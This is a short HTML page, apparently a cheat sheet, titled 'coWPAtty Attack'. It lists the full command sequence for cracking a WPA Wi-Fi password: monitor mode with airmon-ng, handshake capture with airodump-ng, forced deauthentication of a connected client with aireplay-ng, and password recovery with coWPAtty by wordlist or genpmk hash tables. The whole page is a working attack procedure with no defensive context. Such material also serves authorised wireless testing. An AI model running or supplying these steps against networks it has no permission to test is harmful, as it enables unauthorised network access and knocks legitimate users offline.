<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>coWPAtty Attack</title>
</head><body>coWPAtty Attack<br/>
-----------------<br/>
<br/>
Place your wireless card into monitor mode on the channel number of the AP:<br/>
<br/>
airmon-ng start &lt;interface&gt; &lt;AP channel&gt;<br/>
<br/>
Start an Airodump capture, filtering on the AP channel and BSSID, saving the file to disk:<br/>
<br/>
airodump-ng -c &lt;AP channel&gt; --bssid &lt;AP MAC&gt; -w &lt;capture&gt; &lt;interface&gt;<br/>
<br/>
Deauthenticate a connected client to force it to complete the 4-way handshake:<br/>
<br/>
aireplay-ng -0 1 -a &lt;AP MAC&gt; -c &lt;Client MAC&gt; &lt;interface&gt;<br/>
<br/>
To crack the WPA password with coWPAtty in wordlist mode:<br/>
<br/>
cowpatty -r &lt;capture&gt; -f &lt;wordlist&gt; -2 -s &lt;ESSID&gt;<br/>
<br/>
To use rainbow table mode with coWPAtty, first generate the hashes:<br/>
<br/>
genpmk -f &lt;wordlist&gt; -d &lt;hashes filename&gt; -s &lt;ESSID&gt;<br/>
<br/>
Run coWPAtty with the generated hashes to recover the WPA password:<br/>
<br/>
cowpatty -r &lt;capture&gt; -d &lt;hashes filename&gt; -2 -s &lt;ESSID&gt;</body></html>